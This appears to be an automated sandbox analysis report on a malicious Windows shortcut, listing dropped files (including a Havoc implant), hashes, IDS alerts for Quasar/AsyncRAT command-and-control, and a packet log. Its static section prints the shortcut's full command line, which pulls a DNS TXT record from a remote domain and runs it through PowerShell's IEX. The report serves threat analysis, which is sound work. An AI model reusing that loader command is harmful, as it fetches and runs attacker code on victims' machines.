Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\6084f918-be88-44d8-885f-7c1ffc47b810.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 921996
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:rBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOFjNOX1Lj3vfE4JvWTlP:r+Tegs661ybxrr/IxkB1mabFhOXZ/fEh
MD5:	C14EBC9A03804BAB863F67F539F142C6
SHA1:	FD44F63771819778149B24DD4B073940F5D95BFA
SHA-256:	A495629FA5E71EE50BB96F9C4CAEAC46E8B44BFC3F910A073348258F63DFAFCE
SHA-512:	8ED832A54A3925914E3BCFC96A3ABFF63A511ADAC79A869AD1569BB175CC1AF84E6C2BD20FA2187A5C3B733625EDE5D95C2172B24ED2F252835689F6D4A0F5A2
Malicious:	false
Preview:	...........[l\[.......p.a$..$.K...&%J.J...Wuo..dI.vk4.E..P.u..(.....1.I....A...............0.....$ctg.H.'....@.Zk...~.s.A]M.A..:g?.^{...cjL...X..#.Q{......z...m...K.U]-..^V.........@..P...U.R..z.......?......]nG..O{..n........y...v7...~C#..O.z...:...H&..6M;........c..#.y4u.~6.?...V?.%?SW.....K...[..`N.i.1..:..@?i.Q..O...`.....m.!y.{...?=.. .....Zk......%.6......o<.....yA}......no......u,.....U...a.......[S.n..`.....:...1......X..u.u...`..B=.&M.y..s.....}.i..l.'u]. ...6.s`....zdN.F.>;.d%D..}3..b..~..k.......,hl.j..._...F..p.z..o...C..,.Ss.u.Xd..a.Y.{.p...?.k..t,&..'...........^.f.hg....y..Y...i..m....<..^......yK.......;.5...E...K..Q.;k..\|;..B.{m..eS..>b..>...6...wmC.i.....wv..k..{..X...RB.P..?w......1l.H..{{.`g.P.8.Z..v_.G.....f.%+z.....p.P..u}.T.....~r]..W7..._..c.k.....@....y.K...uOSj........^....B..]..~{..;...c....r.J.m.S.}.....k....u*^...5./...{......3.I.p.t...V..........W-..\|.K.N.....n.........Bl...#)..;..4.x.....'....A....x..

C:\Users\user\AppData\Local\Temp\acrocef_low\6d95eae8-d31b-4440-a66a-d4629ddf0bcc.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:6DaWL07oXGZGwYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:caWLxXGZGwZGh3mlind9i4ufFXpAXkru
MD5:	7867DAFF192926A49EB7516D226D452F
SHA1:	BD0B185B12DB865CEA23060A9789C6B2D814B62E
SHA-256:	C7586BA81615BBAA63DA0D81CE18C0D087D1237500C99C35239A4D3CAEED2934
SHA-512:	B556042E82056983EA6A69AEE0DAB370641437EF6239FD04676FC26EC9472C6E5EF6194885C165E3987E8019321DCD9B4A574EA7A6253AC3C9468434AEAA0C21
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\9faeedb6-f2c5-4e46-9486-772e1cda0b4e.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Tasks\62rgx9T9MW.pdf

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.6 (zip deflate encoded)
Category:	dropped
Size (bytes):	4723
Entropy (8bit):	4.167710560882234
Encrypted:	false
SSDEEP:	48:PBtPTwN8gkyvqwUhrFqzmPtskP2cAcaBnLqFvVxs3LF8qn9KyGg:plTwNsydcxvP+kXFynLYV+RlhX
MD5:	91838F714B56205CECA4956B9787BB46
SHA1:	E3C930555A49BEDFB5B294B7D29190DEEDE137BF
SHA-256:	E618B899A3C8C8DE6AB682C1A5B56112DC9E84BD81A8CD13339DCC08AB7D4B35
SHA-512:	FBE988F551400E693677F4E08B31DC6FE15395678813EA0B89686A9FFFD4E8FCDE0CECEDB685F1654E8A482E5EB013AFE253F4379DB92CCD74D4A702F4E30A1C
Malicious:	false
Preview:	%PDF-1.6.%......24 0 obj.<</Filter/FlateDecode/First 4/Length 216/N 1/Type/ObjStm>>stream..h.<.QK.0....}[...$:..i...2..%Kn5.6.&.?.V..s......V.z..{...O.SOC...C..3.....LN.H..us4]...E.\.`KGG.}Y.7.~"....#JlP2..i.Q,.............+.q...W......0..L0d..3....1.lh....:.r....AV8Y..`.i..^\.T\{=\|@..@....z.-..\|.P...endstream.endobj.25 0 obj.<</Filter/FlateDecode/First 4/Length 49/N 1/Type/ObjStm>>stream..h.P0P...w./.+Q0...L).64.....T....$...............endstream.endobj.26 0 obj.<</Filter/FlateDecode/First 9/Length 42/N 2/Type/ObjStm>>stream..h.2S0..`}A....E..@3...SK...\..CR+Jb....K.KR...C*.R.z.S.......'...endstream.endobj.2 0 obj.<</Length 3525/Subtype/XML/Type/Metadata>>stream..<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.4-c005 78.147326, 2012/08/23-13:03:03 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:pdf="http://ns.adobe.com/p

C:\Windows\Tasks\cd394167-be4e-4779-8fcd-6d3374e9bfcc

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	3270672
Entropy (8bit):	6.084183506540094
Encrypted:	false
SSDEEP:	49152:EHrXzgmG+DkuljsDf8YsZYRnml6pNtyGX59L+KqQvYg9vnZ3R:E3s020g9RR
MD5:	1C262BDCBC598E4B63A07D4FECD8C9EC
SHA1:	5824FAED32FE831C5E529D2BFAF12B28DB242FDC
SHA-256:	B8253DAE7C6A0EEC1BF60B82AE094DBB894F68EA32481203B62A6611ABE87628
SHA-512:	E6705FAAE31DBD6A13BB82B2F71E8AC99D339A181C5FAB8D62DE406CBBE02946F5080F2EE6C2B4BCF6444505C6F3A197C4541D201200DD719D43BE4D20B5FCBB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Havoc_2, Description: Yara detected Havoc, Source: C:\Windows\Tasks\cd394167-be4e-4779-8fcd-6d3374e9bfcc, Author: Joe Security Rule: JoeSecurity_Havoc_1, Description: Yara detected Havoc, Source: C:\Windows\Tasks\cd394167-be4e-4779-8fcd-6d3374e9bfcc, Author: Joe Security
Preview:	VH..H...H.. ._...H..^.......H..$H....f..........WV..SH.. eH..%0...H.@`H.@.H.X.H.x.H9.t...SXH.K`.....9.u.H.C0..H....1.H.. [^_.1.f.9MZu.HcA<H..8PE..t.1..H........AWAVAUA..ATUWVSH..8..u.1..z....H..H..t.....E1.....H..n .D$,D.v.D.~$D;f.s.D..1.H.....(H...,...A9.t.A....H..H..B...?H...B..0H..H9.r..l$,H..H9.s..H..8[^_]A\A]A^A_.1.......VSH..(....H....1..S..pH........H..H......u"........H..H..H................H...ZL.;.....H..H.C.......H.........s.....H..H.C.......H.........R.....H..H.C ......H........(.P....H..H.C(......H..........u...H..H.C0......H............W...H..H.CP..{...H............9...H..H.CX..]...H.......<........H..H.C`..?...H.........N......H..H.C8..!...H........d......H..H.C@......H..........j.....H..H.CH......H..........@....H..H.Ch......H.......].......H..H.Cp..\........./...i...H..H.Cx......H............K...H..H........l...H.......?N.;....H..H........K...H........!}h.....H..H........*...H.......aP......H..H............H....... 8.{.....H..H............H......

C:\Windows\Tasks\winver.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1071704
Entropy (8bit):	6.432838117683661
Encrypted:	false
SSDEEP:	24576:5TC6Rb6qu1PyC+NRLtpScpzbtT7pyOolKL8Sq/jrc5xaNIBB:5+6AqSPyC+NltpScpzbtvpJoMQSq/jre
MD5:	8FA52F316C393496F272357191DB6DEB
SHA1:	B1FF3D48A3946CA7786A84E4A832617CD66FA3B9
SHA-256:	92C6531A09180FAE8B2AAE7384B4CEA9986762F0C271B35DA09B4D0E733F9F45
SHA-512:	C81DA97D6980D6A5AA612070477950A1386239BB919E762F7870BCCD459A03DA48F8F169910B91F3827C6CFEF50471569C9E0C9FF2CEB897904D81840C087D51
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: bI2i1g3RLM.exe, Detection: malicious, Browse Filename: bI2i1g3RLM.exe, Detection: malicious, Browse Filename: p1qr388Lap.exe, Detection: malicious, Browse Filename: Install.msi, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.....................................q....`...@...............@..............................l..\|.......P....P...o...4..X&......\|... .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..\|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc..\|............(..............@..B................................................................................................................................................................................................................

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Nov 18 14:22:03 2024, mtime=Tue Dec 17 22:27:42 2024, atime=Mon Nov 18 14:22:03 2024, length=180736, window=hide
Entropy (8bit):	3.709759191614451
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	alyemenione.lnk
File size:	2'488 bytes
MD5:	12ca834e507ca967d01911cec7454312
SHA1:	2d43271a7ec861f87da9bdeced53bd9bb20986ff
SHA256:	9dd34887a7aa11ba28a8e63d484274110ab40a6ad7035f8ff93c19c12ec66542
SHA512:	b3033aab1d18a50957e698bf0dbdaa3e8245f1a74bc7129b486d1ee2f0c5164998603616b48cc67fd4e8cca7bcc40c36ca51e7a5ccf6c54fe02277615c9de4fa
SSDEEP:	48:8RPMK7x3FdUa1IpCd0N3XuHhqXv3VqmH6NGD:8RPMSlUa2lumvZM
TLSH:	7551A0256BD90728F2F24E735173E2418E76B955DE228F5D518052C81412A2AEC3AF7E
File Content Preview:	L..................F.@.. ........9...j.D.P..-A...9..........................A....P.O. .:i.....+00.../C:\...................V.1......Y.'..Windows.@........OwH.Y................................W.i.n.d.o.w.s.....Z.1......Yw.0.System32..B........OwH.Y}.....`.

File Icon


Icon Hash:	929e9e96a3f3d6ed

Static Windows Shortcut Info

General
Relative Path:	..\..\..\Windows\System32\wscript.exe
Command Line Argument:	C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(Resolve-DnsName -Name ebtxghggfv.cdn-streaming.com -Type TXT).Strings \| IEX"
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T23:06:08.403607+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49731	37.1.223.28	443	TCP
2024-12-18T23:06:10.454731+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49732	37.1.223.28	443	TCP
2024-12-18T23:06:17.821977+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49735	37.1.223.28	443	TCP
2024-12-18T23:07:28.872999+0100	2027619	ET MALWARE Observed Malicious SSL Cert (Quasar CnC)	1	37.1.223.28	80	192.168.2.4	49823	TCP
2024-12-18T23:07:28.872999+0100	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	37.1.223.28	80	192.168.2.4	49823	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 23:06:04.231792927 CET	49730	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:04.231882095 CET	443	49730	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:04.231986046 CET	49730	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:04.242902040 CET	49730	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:04.242985964 CET	443	49730	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:05.657058001 CET	443	49730	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:05.657196999 CET	49730	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:05.660341978 CET	49730	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:05.660396099 CET	443	49730	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:05.660832882 CET	443	49730	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:05.679949999 CET	49730	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:05.723397017 CET	443	49730	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:06.198740005 CET	443	49730	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:06.198767900 CET	443	49730	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:06.198928118 CET	443	49730	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:06.198971987 CET	49730	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:06.202011108 CET	49730	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:06.206732035 CET	49730	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:06.524857998 CET	49731	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:06.524909019 CET	443	49731	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:06.524996996 CET	49731	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:06.525212049 CET	49731	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:06.525230885 CET	443	49731	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:07.894684076 CET	443	49731	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:07.896647930 CET	49731	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:07.896660089 CET	443	49731	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:08.403696060 CET	443	49731	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:08.403785944 CET	443	49731	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:08.403877974 CET	49731	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:08.403891087 CET	443	49731	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:08.403940916 CET	443	49731	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:08.403994083 CET	49731	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:08.404339075 CET	49731	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:08.489500046 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:08.489586115 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:08.489711046 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:08.490005970 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:08.490041018 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:09.886858940 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:09.892935038 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:09.892951012 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.454783916 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.454845905 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.454927921 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.454948902 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.494900942 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.565468073 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.565490961 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.565582991 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.648886919 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.649018049 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.681963921 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.682048082 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.707344055 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.707449913 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.757405043 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.757489920 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.833981037 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.834095955 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.848997116 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.849097013 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.862168074 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.862282038 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.879661083 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.879744053 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.879800081 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.893264055 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.893332958 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.893385887 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.904902935 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.904994011 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.914427042 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.914515972 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:10.950859070 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:10.950952053 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.044929028 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.045013905 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.051770926 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.051848888 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.060713053 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.060811043 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.067569017 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.067652941 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.074651003 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.074729919 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.079659939 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.079755068 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.085936069 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.086009026 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.096648932 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.096673012 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.096724033 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.096749067 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.096781969 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.096813917 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.108139038 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.108160973 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.108208895 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.108230114 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.108261108 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.108278990 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.127979040 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.128000021 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.128051043 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.128068924 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.128101110 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.128122091 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.226248980 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.226309061 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.226351023 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.226398945 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.226433992 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.226674080 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.237457037 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.237519979 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.237535000 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.237545013 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.237572908 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.237591982 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.247661114 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.247721910 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.247750044 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.247757912 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.247792006 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.247801065 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.258781910 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.258809090 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.258857965 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.258865118 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.258907080 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.270217896 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.270232916 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.270291090 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.270301104 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.270323038 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.270335913 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:11.280920029 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.280939102 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:11.281009912 CET	49732	443	192.168.2.4	37.1.223.28
